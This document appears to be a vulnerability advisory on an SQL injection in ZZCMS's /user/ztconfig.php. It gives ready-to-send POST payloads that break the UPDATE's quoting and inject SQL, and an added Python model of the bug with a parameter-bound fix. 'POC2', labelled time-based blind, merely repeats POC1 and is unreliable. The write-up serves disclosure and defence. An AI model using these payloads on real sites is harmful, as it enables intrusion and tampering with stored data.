Link Url : http://www.zzcms.net/about/6.htm
Edition : ZZCMS2018升2019 (the 2018-to-2019 upgrade package, 2019-01-11)
0x01 Vulnerability (/user/ztconfig.php line 29 ~ 50)
In the 'modify' branch the 'daohang' variable is built in a loop from $_POST['daohang'][$i].
If $_POST['daohang'] is sent as a plain string instead of an array, PHP's [$i] on a string returns
the character at offset $i rather than an array element, so posting daohang=\ leaves the 'daohang'
variable holding a single backslash.
That backslash is placed unescaped into the UPDATE query, where it escapes the single quote that was
meant to close the 'daohang' value. The string literal therefore does not end where the code expects,
and the quote that opens the next value is swallowed with it.
The next parameter in the statement, 'bannerbg', is not subject to any other security filter, so
once the quoting is broken the text supplied after 'daohang' is parsed as raw SQL and arbitrary
queries can be injected through it.
0x02 payload
Send the "POC" body below as the POST data to "/user/ztconfig.php?action=modify". The "Submit2"
value is the URL-encoded Korean label of the submit button (" 설정 업데이트", "settings update").
The injected SQL, ",bannerbg=@@Version where username=0x636279323334-- a", rides in the last 'img'
field, which overrides the earlier img=123 because PHP keeps the last value of a repeated name;
0x636279323334 is the hex encoding of the username 'cby234'. With the quote broken by daohang=\,
that text is appended to the SET list as raw SQL, so the UPDATE stores the MySQL version string in
the 'bannerbg' column of the row whose username is 'cby234', and the "--" comment discards the rest
of the original statement.
POC : update SQL injection
bannerheight=160&comanestyle=left&comanecolor=%23FFFFFF&daohang=\&img=123&tongji=&baidu_map=&Submit2=+%EC%84%A4%EC%A0%95+%EC%97%85%EB%8D%B0%EC%9D%B4%ED%8A%B8&img=,bannerbg=@@Version+where+username=0x636279323334-- a
POC2 : Time based Blind SQL injection
bannerheight=160&comanestyle=left&comanecolor=%23FFFFFF&daohang=\&img=123&tongji=&baidu_map=&Submit2=+%EC%84%A4%EC%A0%95+%EC%97%85%EB%8D%B0%EC%9D%B4%ED%8A%B8&img=,bannerbg=@@Version+where+username=0x636279323334-- a
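As an added example (not part of this report and not ZZCMS's own code), the following Python models the quoting bug from 0x01 and runs the 0x02 POC body through it, then shows a hardened builder. The UPDATE template, the table name ztconfig, the WHERE username=... clause, the loop bound NAV_SLOTS and the sample POST bodies are assumptions or constructed inputs, since the real statement is not quoted above; the column names daohang, bannerbg and img, the PHP string-offset behaviour and the POC values come from the report.

```python
# Added example, not code from ZZCMS: a model of the daohang quoting bug in
# /user/ztconfig.php?action=modify.  Table name, UPDATE template, WHERE clause
# and NAV_SLOTS are ASSUMED; column names and the POC values are from the report.

NAV_SLOTS = 3  # assumed loop bound for the navigation entries


def php_offset(value, i):
    """Mimic $_POST['daohang'][$i]: an array yields element i, but a plain
    string yields the character at offset i; an out-of-range offset yields ''
    (PHP only emits a notice)."""
    if isinstance(value, (list, str)):
        return value[i] if i < len(value) else ""
    return ""


def assemble_daohang(value):
    """The loop the report describes: daohang .= $_POST['daohang'][$i]."""
    return "".join(php_offset(value, i) for i in range(NAV_SLOTS))


def build_update_vulnerable(post, user):
    """String-built UPDATE in the style the report describes: values dropped
    straight into single quotes, no escaping (assumed template)."""
    daohang = assemble_daohang(post.get("daohang", []))
    bannerbg = post.get("bannerbg", "")
    img = post.get("img", "")
    return ("UPDATE ztconfig SET daohang='%s',bannerbg='%s',img='%s' "
            "WHERE username='%s'" % (daohang, bannerbg, img, user))


def sql_outside_quotes(sql):
    """Return the text MySQL parses as SQL: everything outside single-quoted
    literals, up to a '-- ' comment.  Backslash escapes and doubled quotes are
    honoured, as MySQL does by default (NO_BACKSLASH_ESCAPES off)."""
    out = []
    i, in_literal = 0, False
    while i < len(sql):
        c = sql[i]
        if in_literal:
            if c == "\\":                     # escaped char stays in the literal
                i += 2
                continue
            if c == "'":
                if sql[i + 1:i + 2] == "'":   # '' is an escaped quote
                    i += 2
                    continue
                in_literal = False
            i += 1
            continue
        if c == "'":
            in_literal = True
            i += 1
            continue
        if sql.startswith("-- ", i):          # rest of the statement is a comment
            break
        out.append(c)
        i += 1
    return "".join(out)


def build_update_hardened(post, user):
    """Fix: reject a non-array daohang and bind every value as a driver
    parameter (PEP 249 %s placeholders), so user input never reaches the SQL text."""
    daohang = post.get("daohang")
    if not isinstance(daohang, list) or not all(isinstance(x, str) for x in daohang):
        raise ValueError("daohang must be an array of strings")
    sql = "UPDATE ztconfig SET daohang=%s,bannerbg=%s,img=%s WHERE username=%s"
    params = ("".join(daohang), post.get("bannerbg", ""), post.get("img", ""), user)
    return sql, params


def hardened_rejects(post, user):
    """True if the hardened builder refuses the request."""
    try:
        build_update_hardened(post, user)
    except ValueError:
        return True
    return False


# The 0x02 POC body decoded as PHP would (constructed here; the second img
# field overrides img=123 because PHP keeps the last value of a repeated name).
POC_POST = {
    "bannerheight": "160", "comanestyle": "left", "comanecolor": "#FFFFFF",
    "daohang": "\\",                      # a plain string, not an array
    "tongji": "", "baidu_map": "",
    "img": ",bannerbg=@@Version where username=0x636279323334-- a",
}
# A well-formed request for comparison (constructed).
BENIGN_POST = {"daohang": ["Home", "News", "About"], "bannerbg": "#FFFFFF", "img": "123"}

if __name__ == "__main__":
    for name, post in (("POC", POC_POST), ("benign", BENIGN_POST)):
        stmt = build_update_vulnerable(post, "cby234")
        print(name, "statement :", stmt)
        print(name, "parsed SQL:", sql_outside_quotes(stmt))
    print("hardened rejects POC:", hardened_rejects(POC_POST, "cby234"))
```

Running it shows that the POC body leaves ",bannerbg=@@Version where username=0x636279323334" outside every quoted literal, while the benign body keeps all three values inside quotes. The array check alone is not the fix: build_update_vulnerable with daohang=["\\"] is injectable in exactly the same way, which is why the hardened builder also binds every value as a parameter instead of escaping it by hand.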